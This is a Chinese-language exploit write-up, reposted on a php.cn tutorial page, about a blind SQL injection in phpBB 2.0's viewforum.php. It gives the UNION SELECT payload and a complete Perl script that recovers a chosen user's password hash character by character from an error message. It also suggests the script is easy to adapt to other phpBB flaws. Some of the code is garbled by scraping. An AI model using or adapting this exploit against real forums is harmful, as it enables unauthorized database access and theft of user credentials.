php注入实例_PHP-PHP 튜토리얼-php.cn

집

백엔드 개발

PHP 튜토리얼

php注入实例_PHP

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2016 pm 12:38 PM

ifprintsql세대예주입

php注入实例在网上很难看到一篇完整的关于php注入的文章和利用代码,于是我自已把mysql和php硬啃了几个星期，下面说说我的休会吧,希望能抛砖引玉!
相信大家对asp的注入已经是十分熟悉了,而对php的注入比asp要困难,因为php的magic_gpc选项确实让人头疼,在注入中不要出现引号,而php大多和mysql结合,而mysql的功能上的缺点,从另外一人角度看确在一定程度上防止了sql njection的攻击,我在这里就举一个实例吧,我以phpbb2.0为例:
在viewforum.php中有一个变量没过滤:
if ( isset($HTTP_GET_VARS{
$forum_id = ( isset($HTTP_GET_VARS
($HTTP_POST_VARS}
else if ( isset($HTTP_GET_VARS['forum']))
{
$forum_id = $HTTP_GET_VARS['forum'];
}
else
{
$forum_id = ';
}
就是这个forum,而下面直接把它放进了查询中:
if ( !empty($forum_id) )
{
$sql = "SELECT *
FROM " . FORUMS_TABLE . "
WHERE forum_id = $forum_id";
if ( !($result = $db->sql_query($sql)) )
{
message_die(GENERAL_ERROR, 'Could not obtain forums information', ', __LINE__, __FILE__, $sql);
}
}
else
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

如果是asp的话，相信很多人都会注入了.如果这个forum_id指定的论坛不存在的话，就会使$result为空，于是返回Could not obtain forums information的信息,于是下面的代码就不能执行下去了
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id) /****************************************

关键就是打星号的那一行了,这里是一个函数session_pagestart($user_ip, $thispage_id),这是在session.php中定义的一个函数,由于代码太

长，就不全贴出来了,有兴趣的可以自已看看，关键是这个函数还调用了session_begin(),函数调用如下session_begin($user_id, $user_ip,

$thispage_id, TRUE))，同样是在这个文件中定义的,其中有如下代码
$sql = "UPDATE " . SESSIONS_TABLE . "
SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page =

$page_id, session_logged_in = $login
WHERE session_id = '" . $session_id . "'
AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) ││ !$db->sql_affectedrows() )
{
$session_id = md5(uniqid($user_ip));

$sql = "INSERT INTO " . SESSIONS_TABLE . "
(session_id, session_user_id, session_start, session_time, session_ip, session_page,

session_logged_in)
VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
if ( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', ', __LINE__, __FILE__,

$sql);
}

在这里有个session_page在mysql中定义的是个整形数,他的値$page_id,也就是$forum_id,如果插入的不是整形就会报错了,就会出现Error

creating new session : session_begin的提示,所以要指这$forum_id的值很重要,所以我把它指定为:-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57,没有引号吧!虽然指定的是一个不存在的forum_id但他返回的查询结果可不一定是为空,这个就是猜user_id为2的用户的第一位密码的ascii码值是是否为57,如果是的话文章中第一段代码中的$result可不为空了,于是就执行了ession_pagestart这个有问题的函数，插入的不是整数当然就要出错了，于是就显示Error creating new session : session_begin,就表明你猜对了第一位了，其它位类似.

如果没有这句出错信息的话我想即使注入成功也很难判断是否已经成功，看来出错信息也很有帮助啊.分析就到这里，下面附上一段测试代码，这段代码只要稍加修改就能适用于其它类似的猜md5密码的情况,这里我用的英文版的返回条件，中文和其它语言的只要改一下返回条件就行了.

use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;
$ua = new LWP::UserAgent;

print " ***********************n";
print " phpbb viewforum.php expn";
print " code by pinkeyesn";
print " www.icehack.comn";
print " ************************n";
print "please enter the weak file's url:n";
print "e.g. http://192.168.1.4/phpBB2/viewforum.phpn";
$adr=;
chomp($adr);
print "please enter the user_id that you want to crackn";
$u=;
chomp($u);
print "work starting,please wait!n";
@pink=(48..57);
@pink=(@pink,97..102);
for($j=1;$jfor ($i=0;$i$url=$adr."?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%

20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
$request = HTTP::Request->new('GET', "$url");
$response = $ua->request($request);

if ($response->is_success) {
if ($response->content =~ /Error creating new session/) {
$pwd.=chr($pink[$i]);
print "$pwdn";
}

}
}
}
if ($pwd ne ""){
print "successfully,The password is $pwd,good luckn";}
else{
print "bad luck,work failed!n";}

至于最近的phpbb2.0.6的search.php的问题利用程序只要将上面代码稍加修改就行了,如要错误请上www.icehack.com指正.

성명

본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

관련 기사

Python中的SVM实例Jun 11, 2023 pm 08:42 PM

Python中的支持向量机（SupportVectorMachine，SVM）是一个强大的有监督学习算法，可以用来解决分类和回归问题。SVM在处理高维度数据和非线性问题的时候表现出色，被广泛地应用于数据挖掘、图像分类、文本分类、生物信息学等领域。在本文中，我们将介绍在Python中使用SVM进行分类的实例。我们将使用scikit-learn库中的SVM模

学习Golang指针转换的最佳实践示例Feb 24, 2024 pm 03:51 PM

Golang是一门功能强大且高效的编程语言，可以用于开发各种应用程序和服务。在Golang中，指针是一种非常重要的概念，它可以帮助我们更灵活和高效地操作数据。指针转换是指在不同类型之间进行指针操作的过程，本文将通过具体的实例来学习Golang中指针转换的最佳实践。1.基本概念在Golang中，每个变量都有一个地址，地址就是变量在内存中的位置。

VUE3入门实例：制作一个简单的视频播放器Jun 15, 2023 pm 09:42 PM

随着新一代前端框架的不断涌现，VUE3作为一个快速、灵活、易上手的前端框架备受热爱。接下来，我们就来一起学习VUE3的基础知识，制作一个简单的视频播放器。一、安装VUE3首先，我们需要在本地安装VUE3。打开命令行工具，执行以下命令:npminstallvue@next接着，新建一个HTML文件，引入VUE3：<!doctypehtml>

Gin框架中的验证码使用实例Jun 23, 2023 am 08:10 AM

随着互联网的普及，验证码已经成为了登录、注册、找回密码等操作的必要流程。在Gin框架中，实现验证码功能也变得异常简单。本文将介绍如何在Gin框架中使用第三方库实现验证码功能，并提供示例代码供读者参考。一、安装依赖库在使用验证码之前，我们需要安装一个第三方库goCaptcha。安装goCaptcha可以使用goget命令：$goget-ugithub

Python中的VAE算法实例Jun 11, 2023 pm 07:58 PM

VAE是一种生成模型，全称是VariationalAutoencoder，中文译作变分自编码器。它是一种无监督的学习算法，可以用来生成新的数据，比如图像、音频、文本等。与普通的自编码器相比，VAE更加灵活和强大，能够生成更加复杂和真实的数据。Python是目前使用最广泛的编程语言之一，也是深度学习的主要工具之一。在Python中，有许多优秀的机器学习和深度

Python中的GAN算法实例Jun 10, 2023 am 09:53 AM

生成对抗网络（GAN，GenerativeAdversarialNetworks）是一种深度学习算法，它通过两个神经网络互相竞争的方式来生成新的数据。GAN被广泛用于图像、音频、文字等领域的生成任务。在本文中，我们将使用Python编写一个GAN算法实例，用于生成手写数字图像。数据集准备我们将使用MNIST数据集作为我们的训练数据集。MNIST数据集包含

PHP 简单网络爬虫开发实例Jun 13, 2023 pm 06:54 PM

随着互联网的迅速发展，数据已成为了当今信息时代最为重要的资源之一。而网络爬虫作为一种自动化获取和处理网络数据的技术，正越来越受到人们的关注和应用。本文将介绍如何使用PHP开发一个简单的网络爬虫，并实现自动化获取网络数据的功能。一、网络爬虫概述网络爬虫是一种自动化获取和处理网络资源的技术，其主要工作过程是模拟浏览器行为，自动访问指定的URL地址并提取所

快速上手Django框架：详细教程和实例Sep 28, 2023 pm 03:05 PM

快速上手Django框架：详细教程和实例引言：Django是一款高效灵活的PythonWeb开发框架，由MTV（Model-Template-View）架构驱动。它拥有简单明了的语法和强大的功能，能够帮助开发者快速构建可靠且易于维护的Web应用程序。本文将详细介绍Django的使用方法，并提供具体实例和代码示例，帮助读者快速上手Django框架。一、安装D

See all articles